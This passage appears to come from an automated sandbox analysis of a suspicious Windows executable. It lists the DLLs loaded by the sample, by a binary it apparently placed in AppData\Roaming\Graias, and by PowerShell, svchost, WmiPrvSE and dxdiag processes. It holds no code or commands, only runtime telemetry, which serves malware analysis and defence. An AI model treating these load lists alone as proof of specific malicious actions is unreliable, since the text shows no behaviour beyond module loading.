                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: starttiledata.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: acppage.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: msi.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: wlidprov.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: provsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: policymanager.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: kernel.appcore.dll
